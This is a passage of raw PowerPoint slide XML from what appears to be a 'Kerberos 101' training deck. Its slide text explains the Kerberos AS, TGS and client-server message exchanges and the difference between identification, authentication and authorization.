          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="直線コネクタ 43"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="831396" y="2476500"/>
            <a:ext cx="2990850" cy="106680"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="stealth" w="lg" len="lg"/>
            <a:tailEnd type="oval" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="直線コネクタ 47"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="812346" y="3680460"/>
            <a:ext cx="3009900" cy="66675"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="stealth" w="lg" len="lg"/>
            <a:tailEnd type="oval" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="直線コネクタ 48"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="812346" y="3874770"/>
            <a:ext cx="3009900" cy="133350"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="stealth" w="lg" len="lg"/>
            <a:tailEnd type="oval" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="直線コネクタ 50"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2326821" y="5090160"/>
            <a:ext cx="1495425" cy="62865"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="stealth" w="lg" len="lg"/>
            <a:tailEnd type="oval" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="直線コネクタ 51"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2326821" y="5276850"/>
            <a:ext cx="1495426" cy="133350"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="stealth" w="lg" len="lg"/>
            <a:tailEnd type="oval" w="med" len="med"/>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076700" y="2133600"/>
            <a:ext cx="4815840" cy="1188720"/>
            <a:chOff x="4076700" y="2133600"/>
            <a:chExt cx="4815840" cy="1188720"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="正方形/長方形 83"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4152900" y="2819400"/>
              <a:ext cx="4312920" cy="502920"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="127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0"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="1050" dirty="0">
                  <a:ln w="3175">
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Process to authenticate that the user is the user</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="1050" dirty="0">
                  <a:ln w="3175">
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>If authentication succeeded, KDC issues Ticket-Granting-Ticket (TGT)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1050" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="テキスト ボックス 55"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4076700" y="2148840"/>
              <a:ext cx="1158240" cy="266700"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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lang="en-US" sz="1600" noProof="0" dirty="0">
                  <a:ln w="3175">
                    <a:noFill/>
                  </a:ln>
                  <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>KRB_AS_REQ</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" 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19" name="テキスト ボックス 57"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4076700" y="2476500"/>
              <a:ext cx="1158240" cy="266700"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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lang="en-US" sz="1600" noProof="0" dirty="0">
                  <a:ln w="3175">
                    <a:noFill/>
                  </a:ln>
                  <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>KRB_AS_REP</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" 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20" name="テキスト ボックス 59"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5554980" y="2289810"/>
              <a:ext cx="3337560" cy="266700"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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lang="en-US" sz="1600" noProof="0">
                  <a:ln w="3175">
                    <a:noFill/>
                  </a:ln>
                  <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Authentication Service (AS) exchange</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" 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21" name="右中かっこ 56"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5334000" y="2133600"/>
              <a:ext cx="121920" cy="59436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3" name="Group 32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4076700" y="3531870"/>
            <a:ext cx="4960620" cy="1215390"/>
            <a:chOff x="4076700" y="3531870"/>
            <a:chExt cx="4960620" cy="1215390"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="テキスト ボックス 61"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4076700" y="3547110"/>
              <a:ext cx="1455420" cy="266700"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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lang="en-US" sz="1600" noProof="0" dirty="0">
                  <a:ln w="3175">
                    <a:noFill/>
                  </a:ln>
                  <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>KRB_TGS_REQ</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" 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23" name="テキスト ボックス 62"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4076700" y="3874770"/>
              <a:ext cx="1455420" cy="266700"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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lang="en-US" sz="1600" noProof="0" dirty="0">
                  <a:ln w="3175">
                    <a:noFill/>
                  </a:ln>
                  <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>KRB_TGS_REP</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" 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24" name="テキスト ボックス 63"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5554980" y="3688080"/>
              <a:ext cx="3482340" cy="266700"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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lang="en-US" sz="1600" noProof="0" dirty="0">
                  <a:ln w="3175">
                    <a:noFill/>
                  </a:ln>
                  <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Ticket-Granting Service (TGS) exchange</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" 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25" name="右中かっこ 64"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5334000" y="3531870"/>
              <a:ext cx="121920" cy="59436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正方形/長方形 86"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4152900" y="4244340"/>
              <a:ext cx="4312920" cy="502920"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="127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0"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="1050" dirty="0">
                  <a:ln w="3175">
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Process to get a ticket for network resource which the client requests</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1050" dirty="0">
                  <a:ln w="3175">
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Client must present a TGT</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="Group 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4076700" y="4933950"/>
            <a:ext cx="4892040" cy="1181100"/>
            <a:chOff x="4076700" y="4933950"/>
            <a:chExt cx="4892040" cy="1181100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="テキスト ボックス 69"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4076700" y="4949190"/>
              <a:ext cx="1455420" cy="266700"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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lang="en-US" sz="1600" noProof="0" dirty="0">
                  <a:ln w="3175">
                    <a:noFill/>
                  </a:ln>
                  <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>KRB_AP_REQ</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" 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27" name="テキスト ボックス 70"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4076700" y="5276850"/>
              <a:ext cx="1455420" cy="266700"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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lang="en-US" sz="1600" noProof="0" dirty="0">
                  <a:ln w="3175">
                    <a:noFill/>
                  </a:ln>
                  <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>KRB_AP_REP</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" 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28" name="テキスト ボックス 71"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5554980" y="5090160"/>
              <a:ext cx="2757624" cy="266700"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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lang="en-US" sz="1600" noProof="0" dirty="0">
                  <a:ln w="3175">
                    <a:noFill/>
                  </a:ln>
                  <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Client-Server (CS) exchange</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" 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29" name="右中かっこ 72"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5334000" y="4933950"/>
              <a:ext cx="121920" cy="59436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正方形/長方形 87"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4152900" y="5612130"/>
              <a:ext cx="4815840" cy="502920"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="127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0"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="1050" dirty="0">
                  <a:ln w="3175">
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Process to present a service ticket to Server</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="1050" dirty="0">
                  <a:ln w="3175">
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Integrated with various protocols dependent  on resource (not Kerberos protocol)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1050" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="159661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22" presetClass="entr" presetSubtype="1"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22" presetClass="entr" presetSubtype="1"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right)">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="25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par>
                          <p:cTn id="34" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1250"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="35" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="50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right)">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="43" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="44" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="47" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1250"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="48" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="50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right)">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="56" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="57" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="60" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1250"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="61" presetID="10" presetClass="entr" presetSubtype="0" fill="hold"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What is the difference?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="8496944" cy="3816429"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identification is the process of declaring who you are:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“I am Alice”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication is the process of validating the user identity. Is the user identified as Alice really Alice?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“I am Alice because I know Alice’s password is: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>#@1 (or Alice’s password hash)”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication Protocols:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic Authentication (User/Password in clear text)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NTLM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authorization is the process of verifying that the user has the rights/permissions to do an action.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identification, Authentication, Authorization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="94900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de-DE" dirty="0"/>
              <a:t>Raimund Andrée</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>raimund.andree@microsoft.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Kerberos 101</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
